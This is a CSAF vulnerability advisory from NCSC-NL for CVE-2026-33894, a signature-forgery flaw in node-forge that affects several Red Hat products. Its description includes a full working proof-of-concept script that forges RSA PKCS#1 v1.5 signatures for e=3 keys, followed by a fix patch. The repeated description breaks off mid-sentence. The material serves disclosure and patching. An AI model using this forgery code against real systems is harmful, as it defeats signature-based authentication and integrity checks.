{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or being kept up to date in real time. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability to use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy or incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of forum also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33894",
        "tracking": {
            "current_release_date": "2026-03-31T14:43:16.503839Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33894",
            "initial_release_date": "2026-03-26T22:54:47.260068Z",
            "revision_history": [
                {
                    "date": "2026-03-26T22:54:47.260068Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (6).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T22:54:50.708949Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-27T00:21:03.916334Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-27T00:21:05.856904Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T07:34:56.686996Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:38:06.270273Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:38:08.849290Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:39:04.245578Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-28T07:39:14.786334Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-28T07:40:46.732806Z",
                    "number": "10",
                    "summary": "References created (1)."
                },
                {
                    "date": "2026-03-28T12:28:14.497458Z",
                    "number": "11",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (36).| Product Identifiers created (13).| Product Remediations created (36).| References created (6).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-03-28T12:28:20.179510Z",
                    "number": "12",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-29T00:38:39.207334Z",
                    "number": "13",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-31T14:39:13.538408Z",
                    "number": "14",
                    "summary": "Unknown change."
                }
            ],
            "status": "interim",
            "version": "14"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-2552001",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:cryostat:4"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Cryostat 4"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/5",
                                "product": {
                                    "name": "vers:rpm/5",
                                    "product_id": "CSAFPID-1459353",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:logging:5"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Logging Subsystem for Red Hat OpenShift"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-1508257",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:ansible_automation_platform:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/1",
                                "product": {
                                    "name": "vers:rpm/1",
                                    "product_id": "CSAFPID-5940623",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:podman_desktop:1"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Build of Podman Desktop"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/8",
                                "product": {
                                    "name": "vers:rpm/8",
                                    "product_id": "CSAFPID-1439292",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_data_grid:8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Data Grid 8"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/10",
                                "product": {
                                    "name": "vers:rpm/10",
                                    "product_id": "CSAFPID-2858634",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:10"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/8",
                                "product": {
                                    "name": "vers:rpm/8",
                                    "product_id": "CSAFPID-1439317",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/o:redhat:enterprise_linux:8"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/9",
                                "product": {
                                    "name": "vers:rpm/9",
                                    "product_id": "CSAFPID-1439319",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:enterprise_linux:9"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Enterprise Linux 9"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/7",
                                "product": {
                                    "name": "vers:rpm/7",
                                    "product_id": "CSAFPID-1439294",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_fuse:7"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Fuse 7"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/7",
                                "product": {
                                    "name": "vers:rpm/7",
                                    "product_id": "CSAFPID-1439306",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:jboss_enterprise_bpms_platform:7"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Process Automation 7"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/3",
                                "product": {
                                    "name": "vers:rpm/3",
                                    "product_id": "CSAFPID-1441200",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:quay:3"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Quay 3"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/4",
                                "product": {
                                    "name": "vers:rpm/4",
                                    "product_id": "CSAFPID-2467441",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:apache_camel_hawtio:4"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat build of Apache Camel - HawtIO 4"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/2",
                                "product": {
                                    "name": "vers:rpm/2",
                                    "product_id": "CSAFPID-2467443",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:service_registry:2"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat build of Apicurio Registry 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1837472"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-eda-controller"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1837473"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-gateway"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5222698"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "automation-platform-ui"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Ansible Automation Platform 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5187689"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-operator-bundle"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2914696"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-proxy-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2914697"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch-rhel9-operator"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2855724"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "elasticsearch6-rhel9"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1459355"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "kibana6-rhel8"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2855725"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "logging-curator5-rhel9"
                            }
                        ],
                        "category": "product_family",
                        "name": "Logging Subsystem for Red Hat OpenShift"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2868420"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 10"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1496261"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2109953"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "pcs"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 9"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467444"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.apicurio-apicurio-registry"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat build of Apicurio Registry 2"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467448"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.apicurio-apicurito"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1771999"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.syndesis-syndesis-parent"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Fuse 7"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698055"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.cryostat-cryostat"
                            }
                        ],
                        "category": "product_family",
                        "name": "Cryostat 4"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467442"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "io.hawt-project"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat build of Apache Camel - HawtIO 4"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2467445"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "org.infinispan-infinispan-console"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Data Grid 8"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2698057"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "org.uberfire-uberfire-parent"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Process Automation 7"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-2109952"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "pcs"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Enterprise Linux 8"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5940626"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "podman-desktop-macos-1"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-5940629"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "podman-desktop-windows-1"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Build of Podman Desktop"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-1455906"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "quay-rhel8"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Quay 3"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<1.4.0",
                                "product": {
                                    "name": "vers:unknown/<1.4.0",
                                    "product_id": "CSAFPID-5956281"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Forge"
                    }
                ],
                "category": "vendor",
                "name": "Digital Bazaar"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<1.4.0",
                                "product": {
                                    "name": "vers:unknown/>=0|<1.4.0",
                                    "product_id": "CSAFPID-5920253"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "node-forge"
                    }
                ],
                "category": "vendor",
                "name": "digitalbazaar"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33894",
            "cwe": {
                "id": "CWE-347",
                "name": "Improper Verification of Cryptographic Signature"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "## Summary\nRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling [Bleichenbacher style forgery](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/). This issue is similar to [CVE-2022-24771](https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765), but adds bytes in an addition field within the ASN structure, rather than outside of it. \n\nAdditionally, forge does not validate that signatures include a minimum of 8 bytes of padding as [defined by the specification](https://datatracker.ietf.org/doc/html/rfc2313#section-8), providing attackers additional space to construct Bleichenbacher forgeries. \n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and recent prior versions.\n\n**Configuration assumptions:**\n- Invoke key.verify with defaults (default `scheme` uses RSASSA-PKCS1-v1_5).\n- `_parseAllDigestBytes: true` (default setting).\n\n## Root Cause\n\nIn `lib/rsa.js`, `key.verify(...)`, forge decrypts the signature block, decodes PKCS#1 v1.5 padding (`_decodePkcs1_v1_5`), parses ASN.1, and compares `capture.digest` to the provided digest.\n\nTwo issues are present with this logic:\n\n1. Strict DER byte-consumption (`_parseAllDigestBytes`) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 8017 verification semantics. A forged EM with attacker-controlled additional ASN.1 content inside the parsed container can still pass forge verification while OpenSSL rejects it.\n2. `_decodePkcs1_v1_5` comments mention that PS < 8 bytes should be rejected, but does not implement this logic.\n\n## Reproduction Steps\n1. 
Use Node.js (tested with `v24.9.0`) and clone `digitalbazaar/forge` at commit `8e1d527fe8ec2670499068db783172d4fb9012e5`.\n4. Place and run the PoC script (`repro_min.js`) with `node repro_min.js` in the same level as the `forge` folder.\n5. The script generates a fresh RSA keypair (`4096` bits, `e=3`), creates a normal control signature, then computes a forged candidate using cube-root interval construction.\n6. The script verifies both signatures with:\n  - forge verify (`_parseAllDigestBytes: true`), and\n  - Node/OpenSSL verify (`crypto.verify` with `RSA_PKCS1_PADDING`).\n7. Confirm output includes:\n  - `control-forge-strict: true`\n  - `control-node: true`\n  - `forgery (forge library, strict): true`\n  - `forgery (node/OpenSSL): false`\n\n## Proof of Concept\n\n**Overview:**\n- Demonstrates a valid control signature and a forged signature in one run.\n- Uses strict forge parsing mode explicitly (`_parseAllDigestBytes: true`, also forge default).\n- Uses Node/OpenSSL as an differential verification baseline.\n- Observed output on tested commit:\n\n```text\ncontrol-forge-strict: true\ncontrol-node: true\nforgery (forge library, strict): true\nforgery (node/OpenSSL): false\n```\n\n<details><summary>repro_min.js</summary>\n\n```javascript\n#!/usr/bin/env node\n'use strict';\n\nconst crypto = require('crypto');\nconst forge = require('./forge/lib/index');\n\n// DER prefix for PKCS#1 v1.5 SHA-256 DigestInfo, without the digest bytes:\n// SEQUENCE {\n//   SEQUENCE { OID sha256, NULL },\n//   OCTET STRING <32-byte digest>\n// }\n// Hex: 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20\nconst DIGESTINFO_SHA256_PREFIX = Buffer.from(\n  '300d060960864801650304020105000420',\n  'hex'\n);\n\nconst toBig = b => BigInt('0x' + (b.toString('hex') || '0'));\nfunction toBuf(n, len) {\n  let h = n.toString(16);\n  if (h.length % 2) h = '0' + h;\n  const b = Buffer.from(h, 'hex');\n  return b.length < len ? 
Buffer.concat([Buffer.alloc(len - b.length), b]) : b;\n}\nfunction cbrtFloor(n) {\n  let lo = 0n;\n  let hi = 1n;\n  while (hi * hi * hi <= n) hi <<= 1n;\n  while (lo + 1n < hi) {\n    const mid = (lo + hi) >> 1n;\n    if (mid * mid * mid <= n) lo = mid;\n    else hi = mid;\n  }\n  return lo;\n}\nconst cbrtCeil = n => {\n  const f = cbrtFloor(n);\n  return f * f * f === n ? f : f + 1n;\n};\nfunction derLen(len) {\n  if (len < 0x80) return Buffer.from([len]);\n  if (len <= 0xff) return Buffer.from([0x81, len]);\n  return Buffer.from([0x82, (len >> 8) & 0xff, len & 0xff]);\n}\n\nfunction forgeStrictVerify(publicPem, msg, sig) {\n  const key = forge.pki.publicKeyFromPem(publicPem);\n  const md = forge.md.sha256.create();\n  md.update(msg.toString('utf8'), 'utf8');\n  try {\n    // verify(digestBytes, signatureBytes, scheme, options):\n    // - digestBytes: raw SHA-256 digest bytes for `msg`\n    // - signatureBytes: binary-string representation of the candidate signature\n    // - scheme: undefined => default RSASSA-PKCS1-v1_5\n    // - options._parseAllDigestBytes: require DER parser to consume all bytes\n    //   (this is forge's default for verify; set explicitly here for clarity)\n    return { ok: key.verify(md.digest().getBytes(), sig.toString('binary'), undefined, { _parseAllDigestBytes: true }) };\n  } catch (err) {\n    return { ok: false, err: err.message };\n  }\n}\n\nfunction main() {\n  const { privateKey, publicKey } = crypto.generateKeyPairSync('rsa', {\n    modulusLength: 4096,\n    publicExponent: 3,\n    privateKeyEncoding: { type: 'pkcs1', format: 'pem' },\n    publicKeyEncoding: { type: 'pkcs1', format: 'pem' }\n  });\n\n  const jwk = crypto.createPublicKey(publicKey).export({ format: 'jwk' });\n  const nBytes = Buffer.from(jwk.n, 'base64url');\n  const n = toBig(nBytes);\n  const e = toBig(Buffer.from(jwk.e, 'base64url'));\n  if (e !== 3n) throw new Error('expected e=3');\n\n  const msg = Buffer.from('forged-message-0', 'utf8');\n  const digest = 
crypto.createHash('sha256').update(msg).digest();\n  const algAndDigest = Buffer.concat([DIGESTINFO_SHA256_PREFIX, digest]);\n\n  // Minimal prefix that forge currently accepts: 00 01 00 + DigestInfo + extra OCTET STRING.\n  const k = nBytes.length;\n  // ffCount can be set to any value at or below 111 and produce a valid signature.\n  // ffCount should be rejected for values below 8, since that would constitute a malformed PKCS1 package.\n  // However, current versions of node forge do not check for this.\n  // Rejection of packages with less than 8 bytes of padding is bad but does not constitute a vulnerability by itself.\n  const ffCount = 0; \n  // `garbageLen` affects DER length field sizes, which in turn affect how\n  // many bytes remain for garbage. Iterate to a fixed point so total EM size is exactly `k`.\n  // A small cap (8) is enough here: DER length-size transitions are discrete\n  // and few (<128, <=255, <=65535, ...), so this stabilizes quickly.\n  let garbageLen = 0;\n  for (let i = 0; i < 8; i += 1) {\n    const gLenEnc = derLen(garbageLen).length;\n    const seqLen = algAndDigest.length + 1 + gLenEnc + garbageLen;\n    const seqLenEnc = derLen(seqLen).length;\n    const fixed = 2 + ffCount + 1 + 1 + seqLenEnc + algAndDigest.length + 1 + gLenEnc;\n    const next = k - fixed;\n    if (next === garbageLen) break;\n    garbageLen = next;\n  }\n  const seqLen = algAndDigest.length + 1 + derLen(garbageLen).length + garbageLen;\n  const prefix = Buffer.concat([\n    Buffer.from([0x00, 0x01]),\n    Buffer.alloc(ffCount, 0xff),\n    Buffer.from([0x00]),\n    Buffer.from([0x30]), derLen(seqLen),\n    algAndDigest,\n    Buffer.from([0x04]), derLen(garbageLen)\n  ]);\n\n  // Build the numeric interval of all EM values that start with `prefix`:\n  // - `low`  = prefix || 00..00\n  // - `high` = one past (prefix || ff..ff)\n  // Then find `s` such that s^3 is inside [low, high), so EM has our prefix.\n  const suffixLen = k - prefix.length;\n  const low = 
toBig(Buffer.concat([prefix, Buffer.alloc(suffixLen)]));\n  const high = low + (1n << BigInt(8 * suffixLen));\n  const s = cbrtCeil(low);\n  if (s > cbrtFloor(high - 1n) || s >= n) throw new Error('no candidate in interval');\n\n  const sig = toBuf(s, k);\n\n  const controlMsg = Buffer.from('control-message', 'utf8');\n  const controlSig = crypto.sign('sha256', controlMsg, {\n    key: privateKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  });\n\n  // forge verification calls (library under test)\n  const controlForge = forgeStrictVerify(publicKey, controlMsg, controlSig);\n  const forgedForge = forgeStrictVerify(publicKey, msg, sig);\n\n  // Node.js verification calls (OpenSSL-backed reference behavior)\n  const controlNode = crypto.verify('sha256', controlMsg, {\n    key: publicKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  }, controlSig);\n  const forgedNode = crypto.verify('sha256', msg, {\n    key: publicKey,\n    padding: crypto.constants.RSA_PKCS1_PADDING\n  }, sig);\n\n  console.log('control-forge-strict:', controlForge.ok, controlForge.err || '');\n  console.log('control-node:', controlNode);\n  console.log('forgery (forge library, strict):', forgedForge.ok, forgedForge.err || '');\n  console.log('forgery (node/OpenSSL):', forgedNode);\n}\n\nmain();\n```\n</details>\n\n## Suggested Patch\n- Enforce PKCS#1 v1.5 BT=0x01 minimum padding length (`PS >= 8`) in `_decodePkcs1_v1_5` before accepting the block.\n- Update the RSASSA-PKCS1-v1_5 verifier to require canonical DigestInfo structure only (no extra attacker-controlled ASN.1 content beyond expected fields).\n\nHere is a Forge-tested patch to resolve the issue, though it should be verified for consumer projects:\n\n```diff\nindex b207a63..ec8a9c1 100644\n--- a/lib/rsa.js\n+++ b/lib/rsa.js\n@@ -1171,6 +1171,14 @@ pki.setRsaPublicKey = pki.rsa.setPublicKey = function(n, e) {\n             error.errors = errors;\n             throw error;\n           }\n+\n+          if(obj.value.length != 2) 
{\n+            var error = new Error(\n+              'DigestInfo ASN.1 object must contain exactly 2 fields for ' +\n+              'a valid RSASSA-PKCS1-v1_5 package.');\n+            error.errors = errors;\n+            throw error;\n+          }\n           // check hash algorithm identifier\n           // see PKCS1-v1-5DigestAlgorithms in RFC 8017\n           // FIXME: add support to validator for strict value choices\n@@ -1673,6 +1681,10 @@ function _decodePkcs1_v1_5(em, key, pub, ml) {\n       }\n       ++padNum;\n     }\n+\n+    if (padNum < 8) {\n+      throw new Error('Encryption block is invalid.');\n+    }\n   } else if(bt === 0x02) {\n     // look for 0x00 byte\n     padNum = 0;\n```\n## Resources\n- RFC 2313 (PKCS v1.5): https://datatracker.ietf.org/doc/html/rfc2313#section-8\n  - > This limitation guarantees that the length of the padding string PS is at least eight octets, which is a security condition. \n- RFC 8017: https://www.rfc-editor.org/rfc/rfc8017.html\n- `lib/rsa.js` `key.verify(...)` at lines ~1139-1223.\n- `lib/rsa.js` `_decodePkcs1_v1_5(...)` at lines ~1632-1695.\n\n## Credit\n\nThis vulnerability was discovered as part of a U.C. Berkeley security research project by: Austin Chu, Sohee Kim, and Corban Villa.",
                    "title": "github - https://api.github.com/advisories/GHSA-ppp5-5v6c-4jwp"
                },
                {
                    "category": "description",
                    "text": "## Summary\nRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling [Bleichenbacher style forgery](https://mailarchive.ietf.org/arch/msg/openpgp/5rnE9ZRN1AokBVj3VqblGlP63QE/). This issue is similar to [CVE-2022-24771](https://github.com/digitalbazaar/forge/security/advisories/GHSA-cfm4-qjh2-4765), but adds bytes in an addition field within the ASN structure, rather than outside of it. \n\nAdditionally, forge does not validate that signatures include a minimum of 8 bytes of padding as [defined by the specification](https://datatracker.ietf.org/doc/html/rfc2313#section-8), providing attackers additional space to construct Bleichenbacher forgeries. \n\n## Impacted Deployments\n**Tested commit:** `8e1d527fe8ec2670499068db783172d4fb9012e5`\n**Affected versions:** tested on v1.3.3 (latest release) and recent prior versions.\n\n**Configuration assumptions:**\n- Invoke key.verify with defaults (default `scheme` uses RSASSA-PKCS1-v1_5).\n- `_parseAllDigestBytes: true` (default setting).\n\n## Root Cause\n\nIn `lib/rsa.js`, `key.verify(...)`, forge decrypts the signature block, decodes PKCS#1 v1.5 padding (`_decodePkcs1_v1_5`), parses ASN.1, and compares `capture.digest` to the provided digest.\n\nTwo issues are present with this logic:\n\n1. Strict DER byte-consumption (`_parseAllDigestBytes`) only guarantees all bytes are parsed, not that the parsed structure is the canonical minimal DigestInfo shape expected by RFC 